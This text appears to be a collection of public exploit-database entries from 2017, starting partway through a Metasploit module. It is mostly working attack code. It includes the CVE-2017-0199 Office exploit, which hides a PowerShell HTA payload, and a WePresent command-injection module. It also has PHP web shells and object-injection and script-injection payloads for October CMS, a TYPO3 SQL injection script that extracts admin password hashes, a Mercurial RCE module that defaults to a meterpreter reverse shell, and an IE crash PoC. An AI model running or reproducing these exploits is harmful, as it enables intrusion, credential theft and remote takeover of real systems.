in Oct 2016. This module was created by reversing a public
malware sample.
},
'Author' =>
[
'Haifei Li', # vulnerability analysis
'ryHanson',
'wdormann',
'DidierStevens',
'vysec',
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-0199'],
['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
],
'Platform' => 'win',
'Targets' =>
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
uri.delete!("\\")
padding_length = uri_maxlength * 2 - uri.length
fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
padding_length.times { uri << "0" }
uri
end
def create_ole_ministream_data
# require 'rex/ole'
# ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
# ministream = ole.instance_variable_get(:@ministream)
# ministream_data = ministream.instance_variable_get(:@data)
ministream_data = ""
ministream_data << "01000002090000000100000000000000" # 00000000: ................
ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
ministream_data << generate_uri
ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
ministream_data << "00000000000000000000000000000000" # 000000f0: ................
ministream_data << "100203000d0000000000000000000000" # 00000100: ................
ministream_data << "00000000000000000000000000000000" # 00000110: ................
ministream_data << "00000000000000000000000000000000" # 00000120: ................
ministream_data << "00000000000000000000000000000000" # 00000130: ................
ministream_data << "00000000000000000000000000000000" # 00000140: ................
ministream_data << "00000000000000000000000000000000" # 00000150: ................
ministream_data << "00000000000000000000000000000000" # 00000160: ................
ministream_data << "00000000000000000000000000000000" # 00000170: ................
ministream_data << "00000000000000000000000000000000" # 00000180: ................
ministream_data << "00000000000000000000000000000000" # 00000190: ................
ministream_data << "00000000000000000000000000000000" # 000001a0: ................
ministream_data << "00000000000000000000000000000000" # 000001b0: ................
ministream_data << "00000000000000000000000000000000" # 000001c0: ................
ministream_data << "00000000000000000000000000000000" # 000001d0: ................
ministream_data << "00000000000000000000000000000000" # 000001e0: ................
ministream_data << "00000000000000000000000000000000" # 000001f0: ................
ministream_data
end
def create_rtf_format
template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
template_rtf = ::File.open(template_path, 'rb')
data = template_rtf.read(template_rtf.stat.size)
data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
template_rtf.close
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'WePresent WiPG-1000 Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in an undocumented
CGI file in several versions of the WePresent WiPG-1000 devices.
Version 2.0.0.7 was confirmed vulnerable, 2.2.3.0 patched this vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matthias Brun', # Vulnerability Discovery, Metasploit Module
],
'References' =>
[
[ 'URL', 'https://www.redguard.ch/advisories/wepresent-wipg1000.txt' ]
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat openssl'
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['WiPG-1000 <=2.0.0.7', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Apr 20 2017',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => '/cgi-bin/rdfs.cgi'
})
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'
}
)
end
end
---------------------------------------------------------------
# Exploit Title: XSRF Stored Revive Ad Server 4.0.1
# Date: 24/04/2017
# Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
# Vendor Website : https://www.revive-adserver.com/
# Software download : https://www.revive-adserver.com/download/
# Version: 4.0.1
# Tested on: Windows 7 x64 SP1 / Kali Linux
Description :
A vulnerability has been discovered in Revive Ad Server, which can be
exploited by malicious people to conduct cross-site scripting attacks.
When you create a banner using Generic HTML Banner, input
passed via the 'htmltemplate' parameter to '/banner-edit.php' is not
properly sanitised before being returned to the user (This is probably
expected as it's an html banner). But, this can be exploited
to execute arbitrary HTML and script code in a user's browser session in
context of an affected site.
This XSS vector allow to execute scripts to gather the CSRF token
and submit a form to update user rights
Here's the script :
---------------------- Javascript-------------------------------
var tok = document.getElementsByName('token')[0].value;
var txt = '<form method="POST" id="hacked" action="agency-user.php">'
txt += '<input type="hidden" name="submit[]" value="1"/>'
txt += '<input type="hidden" name="token" value="' + tok + '"/>'
txt += '<input type="hidden" name="userid" value="2"/>'
txt += '<input type="hidden" name="email_address" value="test2@test.com"/>'
txt += '<input type="hidden" name="agencyid" value="1"/>'
txt += '<input type="hidden" name="permissions[]" value="10"/>'
txt += '</form>'
var d1 = document.getElementById('firstLevelContent');
d1.insertAdjacentHTML('afterend', txt);
document.getElementById("hacked").submit();
---------------------- Javascript End-------------------------------
(little trick to submit a form that has a "submit" parameter, just use a
list "submit[]")
This will update user rights and allow to manage accounts
POC video : https://www.youtube.com/watch?v=wFuN-ADlJpM
Patch : No patch yet
---------------------------------------------------------------
October CMS v1.0.412 several vulnerabilities
############################################
Information
===========
Name: October CMS v1.0.412 (build 412)
Homepage: http://octobercms.com
Vulnerability: several issues, including PHP code execution
Prerequisites: attacker has to be authenticated user with media or asset
management permission
CVE: pending
Credit: Anti Räis
HTML version: https://bitflipper.eu
Product
=======
October is a free, open-source, self-hosted CMS platform based on the
Laravel
PHP Framework.
Description
===========
October CMS build 412 contains several vulnerabilities. Some of them
allow an
attacker to execute PHP code on the server. Following issues have been
identified:
1. PHP upload protection bypass
2. Apache .htaccess upload
3. stored WCI in image name
4. reflected WCI while displaying project ID
5. PHP code execution via asset management
6. delete file via PHP object injection
7. asset save path modification
Proof of Concepts
=================
1. PHP upload protection bypass
-------------------------------
Authenticated user with permission to upload and manage media contents can
upload various files on the server. Application prevents the user from
uploading PHP code by checking the file extension. It uses black-list based
approach, as seen in octobercms/vendor/october/rain/src/Filesystem/
Definitions.php:blockedExtensions().
==================== source start ========================
106 <?php
107 protected function blockedExtensions()
108 {
109 return [
110 // redacted
111 'php',
112 'php3',
113 'php4',
114 'phtml',
115 // redacted
116 ];
117 }
==================== source end ========================
We can easily bypass file upload restriction on those systems by using an
alternative extension, e.g if we upload sh.php5 on the server:
==================== source start ========================
<?php $_REQUEST['x']($_REQUEST['c']);
==================== source end ========================
Code can be execute by making a following request:
http://victim.site/storage/app/media/sh.php5?x=system&c=pwd
2. Apache .htaccess upload
--------------------------
As described in the PHP upload protection bypass section, the
application uses
black-list based defense. It does not prevent the attacker from uploading a
.htaccess files which makes it exploitable on Apache servers. Attacker
can use
it to add another handler for PHP files and upload code under an alternative
name. Attacker has to first upload the .htaccess configuration file with
following settings:
==================== source start ========================
AddHandler application/x-httpd-php .z
==================== source end ========================
This will execute all .z files as PHP and after uploading a code named
sh.z to
the server. It can be used to execute code as described previously.
3. stored WCI in image name
---------------------------
Authenticated user, with permission to customize back-end settings, can
store
WCI payload in the image name. The functionality is located at:
Settings -> Customize Back-end -> Brand Logo -> (upload logo) ->
(edit name) -> (add title)
Set the name to following value:
==================== source start ========================
"><script>alert("stored WCI")</script x="
==================== source end ========================
Payload is executed when the victim clicks on the image name to edit it.
When the administrator edits user's profile image, attacker's payload is
executed, allowing him to execute JavaScript during administrator's active
session. This can be used, for example, to give another user a "super-user"
permission.
4. reflected WCI while displaying project ID
--------------------------------------------
Authenticated user with permission to manage software updates can "Attach
Project". When invalid value is provided, the error message doesn't properly
escape the given value, which allows an attacker to execute code. Since it
requires the victim to paste or write the payload in the input field,
then it
isn't easily exploitable.
==================== source start ========================
"><script>alert(1)</script x="
==================== source end ========================
5. PHP code execution via asset management
------------------------------------------
Authenticated user with permission to manage website assets, can use this
functionality to upload PHP code and execute it on the server.
Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.
First, attacker creates a new asset test.js with the following content:
==================== source start ========================
<pre><?php if(isset($_REQUEST['x'])){echo system($_REQUEST['x']);}?></pre>
==================== source end ========================
After saving the file, attacker renames it to test.php5 by clicking on ">_"
icon on the newly created file. Modal window opens which allows to specify a
new filename.
URL to execute PHP code:
http://victim.site/themes/demo/assets/test.php5?x=ls%20-lah
6. delete file via PHP object injection
---------------------------------------
Authenticated user with "Create, modify and delete CMS partials" or "Create,
modify and delete CMS layouts" can move assets to different folders. This
functionality is vulnerable to PHP object injection. User input is read from
selectedList parameter on line 11 and passed as argument to unserialize().
Unserialized array object is passed to validatePath() on line 32.
==================== source start ========================
1 <?php namespace Cms\Widgets;
2
3 class AssetList extends WidgetBase
4 {
5 // redacted
6
7 public function onMove()
8 {
9 $this->validateRequestTheme();
10
11 $selectedList = Input::get('selectedList');
12 if (!strlen($selectedList)) {
13 throw new ApplicationException(
Lang::get('cms::lang.asset.selected_files_not_found'));
14 }
15
16 $destinationDir = Input::get('dest');
17 if (!strlen($destinationDir)) {
18 throw new ApplicationException(
Lang::get('cms::lang.asset.select_destination_dir'));
19 }
20
21 $destinationFullPath = $this->getFullPath($destinationDir);
22 if (!file_exists($destinationFullPath) ||
!is_dir($destinationFullPath)) {
23 throw new ApplicationException(
Lang::get('cms::lang.asset.destination_not_found'));
24 }
25
26 $list = @unserialize(@base64_decode($selectedList));
27 if ($list === false) {
28 throw new ApplicationException(
Lang::get('cms::lang.asset.selected_files_not_found'));
29 }
30
31 foreach ($list as $path) {
32 if (!$this->validatePath($path)) {
33 throw new ApplicationException(
Lang::get('cms::lang.asset.invalid_path'));
34 }
35
36 // ...
==================== source end ========================
Following PHP exploit uses the vulnerability. It requires an authenticated
user's session to execute as described previously.
==================== source start ========================
<?php
class Swift_Mime_SimpleHeaderSet {}
class Swift_KeyCache_DiskKeyCache
{
private $_keys;
public function __construct($path, $filename) {
$this->_keys = [$path => [ $filename => null]];
}
}
class Swift_Mime_SimpleMimeEntity {
private $_headers;
private $_cache;
private $_cacheKey;
public function __construct($filename, $path = '') {
$this->_headers = new Swift_Mime_SimpleHeaderSet();
$this->_cache = new Swift_KeyCache_DiskKeyCache($path,
$filename);
$this->_cacheKey = $path;
}
}
function payload($filename) {
$builder = new Swift_Mime_SimpleMimeEntity($filename);
return base64_encode(serialize([$builder]));
}
function http($config) {
$ch = curl_init($config['url']);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
http_build_query($config['data']));
curl_setopt($ch, CURLOPT_HTTPHEADER, $config['headers']);
curl_setopt($ch, CURLOPT_COOKIE, $config['cookies']);
curl_setopt($ch, CURLOPT_PROXY, $config['proxy']);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
return curl_exec($ch);
}
function get_config($url, $filename, $session) {
return [
'url' => $url.'/backend/cms',
'data' => [
'dest' => '/',
'theme' => 'demo',
'selectedList' => payload($filename),
],
'headers' => [
'X-OCTOBER-REQUEST-HANDLER: assetList::onMove',
'X-Requested-With: XMLHttpRequest',
],
'cookies' => 'admin_auth='.$session,
'proxy' => 'localhost:8080',
];
}
$url = 'http://victim.site';
$session = '<specify admin_auth cookie value here>';
$filename = '/tmp/target.txt';
echo http(get_config($url, $filename, $session));
==================== source end ========================
7. asset save path modification
-------------------------------
Authenticated user, with permission to manage website assets, can modify the
path the file is saved to. This allows an attacker to save css, js, less,
sass, scss files at different locations. Attacker can possibly use it to
execute JavaScript on the site, if the application tries to require an
file on
the server that does not exist or the attacker manages to delete the file
beforehand. When an attacker creates a new asset, then the following request
is made.
Asset management URL: http://victim.site/backend/cms.
Functionality is located at: CMS -> Assets -> Add -> Create file.
==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 817
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close
fileName=test.js&content=test&templateType=asset&theme=demo
==================== request end ====================
The parameter fileName isn't validated and allows an attacker to specify an
path where the file should be saved to. Overwriting files is forbidden.
If we
specify the file name as ../../../test.js then we can assert that the
file is
created at the root of site's web directory.
We can execute JavaScript by combining this issue with file deletion
vulnerability via POI. For that, we are going to replace the
modules/backend/
assets/js/vendor/jquery.min.js file with our own content. It is loaded
on the
page for every authenticated user and allows us as an attacker to take
control
of their session. The payload for this example is the following:
==================== source start ========================
var c = new XMLHttpRequest();
c.open('GET', 'https://code.jquery.com/jquery-1.11.1.js', false);
c.onreadystatechange = () => eval(c.responseText);
c.send();
var h = () => {location.hash = 'Hacked: ' + (new Date())};
setInterval(h, 1000);
==================== source end ========================
After we delete the jquery.min.js file on the server, we create a new asset
with the payload as the content.
==================== request ========================
POST /backend/cms HTTP/1.1
Host: victim.site
Content-Length: 371
Content-Type: application/x-www-form-urlencoded
X-OCTOBER-REQUEST-HANDLER: onSave
X-Requested-With: XMLHttpRequest
Cookie: admin_auth=...;
Connection: close
fileName=../../../modules/backend/assets/js/vendor/jquery.min.js&content=
var+c+%3d+new+XMLHttpRequest()%3b
c.open('GET',+'https%3a//code.jquery.com/jquery-1.11.1.js',+false)%3b
c.onreadystatechange+%3d+()+%3d>+eval(c.responseText)%3b
c.send()%3b
var+h+%3d+()+%3d>+{location.hash+%3d+'Hacked%3a+'+%2b+(new+Date())}%3b
setInterval(h,+1000)%3b
&templateType=asset&theme=demo
==================== request end ====================
After the victim authenticates, the payload is executed. For this
example, it
changes the URL hash every second, but can be used to take control of the
victims session.
Conclusion
==========
Authenticated user with permission to manage website assets, upload and
manage
media contents or customize back-end settings can use vulnerabilities found
there to execute PHP code on the server and take control of the application.
New release v1.0.413 has been made available as a result:
https://octobercms.com/support/article/rn-8
https://github.com/octobercms/october/releases/tag/v1.0.413.
Timeline
========
05.04.2017 | me > developer | first vulnerability discovered
06.04.2017 | me > developer | initial contact
07.04.2017 | me > developer | sent PoC
09.04.2017 | developer > me | developer implemented patches;
requested additional information
09.04.2017 | me > developer | sent PoC with additional information
and findings
10.04.2017 | developer > me | all issues were patched
11.04.2017 | developer > public | new release
11.04.2017 | me > DWF | CVE request
12.04.2017 | me > public | full disclosure
---
Anti Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com
# Exploit Title: TYPO3 News Module SQL Injection
# Vendor Homepage: https://typo3.org/extensions/repository/view/news
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/typo3-news-module-sqli
#!/usr/bin/python3
# TYPO3 News Module SQL Injection Exploit
# https://www.ambionics.io/blog/typo3-news-module-sqli
# cf
#
# The injection algorithm is not optimized, this is just meant to be a POC.
#
import requests
import string
session = requests.Session()
session.proxies = {'http': 'localhost:8080'}
# Change this
URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
PATTERN0 = 'Article #1'
PATTERN1 = 'Article #2'
FULL_CHARSET = string.ascii_letters + string.digits + '$./'
def blind(field, table, condition, charset):
# We add 9 so that the result has two digits
# If the length is superior to 100-9 it won't work
size = blind_size(
'length(%s)+9' % field, table, condition,
2, string.digits
)
size = int(size) - 9
data = blind_size(
field, table, condition,
size, charset
)
return data
def select_position(field, table, condition, position, char):
payload = 'select(%s)from(%s)where(%s)' % (
field, table, condition
)
payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
payload, ord(char)
)
return payload
def blind_size(field, table, condition, size, charset):
string = ''
for position in range(size):
for char in charset:
payload = select_position(field, table, condition, position+1, char)
if test(payload):
string += char
print(string)
break
else:
raise ValueError('Char was not found')
return string
def test(payload):
response = session.post(
URL,
data=data(payload)
)
response = response.text
return response.index(PATTERN0) < response.index(PATTERN1)
def data(payload):
return {
'tx_news_pi1[overwriteDemand][order]': payload,
'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
'tx_news_pi1[search][subject]': '',
'tx_news_pi1[search][minimumDate]': '2016-01-01',
'tx_news_pi1[search][maximumDate]': '2016-12-31',
}
# Exploit
print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SSH
def initialize(info={})
super(update_info(info,
'Name' => "Mercurial Custom hg-ssh Wrapper Remote Code Exec",
'Description' => %q{
This module takes advantage of custom hg-ssh wrapper implementations that don't
adequately validate parameters passed to the hg binary, allowing users to trigger a
Python Debugger session, which allows arbitrary Python code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'claudijd',
],
'References' =>
[
['URL', 'https://www.mercurial-scm.org/wiki/WhatsNew#Mercurial_4.1.3_.282017-4-18.29']
],
'DefaultOptions' =>
{
'Payload' => 'python/meterpreter/reverse_tcp',
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [ ['Automatic', {}] ],
'Privileged' => false,
'DisclosureDate' => "Apr 18 2017",
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(22),
OptString.new('USERNAME', [ true, 'The username for authentication', 'root' ]),
OptPath.new('SSH_PRIV_KEY_FILE', [ true, 'The path to private key for ssh auth', '' ]),
]
)
register_advanced_options(
[
OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
]
)
end
def rhost
datastore['RHOST']
end
def rport
datastore['RPORT']
end
def username
datastore['USERNAME']
end
def ssh_priv_key
File.read(datastore['SSH_PRIV_KEY_FILE'])
end
def exploit
factory = ssh_socket_factory
ssh_options = {
auth_methods: ['publickey'],
config: false,
use_agent: false,
key_data: [ ssh_priv_key ],
port: rport,
proxy: factory,
non_interactive: true
}
ssh_options.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
print_status("#{rhost}:#{rport} - Attempting to login...")
begin
ssh = nil
::Timeout.timeout(datastore['SSH_TIMEOUT']) do
ssh = Net::SSH.start(rhost, username, ssh_options)
end
rescue Rex::ConnectionError
return
rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return
rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return
rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication due wrong credentials."
rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return
end
if ssh
print_good("SSH connection is established.")
ssh.open_channel do |ch|
ch.exec "hg -R --debugger serve --stdio" do |ch, success|
ch.on_extended_data do |ch, type, data|
if data.match(/entering debugger/)
print_good("Triggered Debugger (#{data})")
ch.send_data "#{payload.encoded}\n"
else
print_bad("Unable to trigger debugger (#{data})")
end
end
end
end
begin
ssh.loop unless session_created?
rescue Errno::EBADF => e
elog(e.message)
end
end
end
end
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1118
There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.
PoC:
===========================================================
-->
<!-- saved from url=(0014)about:internet -->
<style>
#details { transition-duration: 61s; }
</style>
<script>
function go() {
document.fgColor = "foo";
m.setAttribute("foo", "bar");
document.head.innerHTML = "a";
}
</script>
<body onload=go()>
<details id="details">
<summary style="transform: scaleY(4)">
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>
<style></style>
<!--
===========================================================
The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.
Debug info:
(d10.1504): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
0:021> r
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????
0:021> k
# ChildEBP RetAddr
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b
-->
# Exploit Title: Easy File Uploader - Arbitrary File Upload
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
POC
Drop file php (shell.php) to upload.
access to http://poc_site/fileFolder/shell.php and enjoy!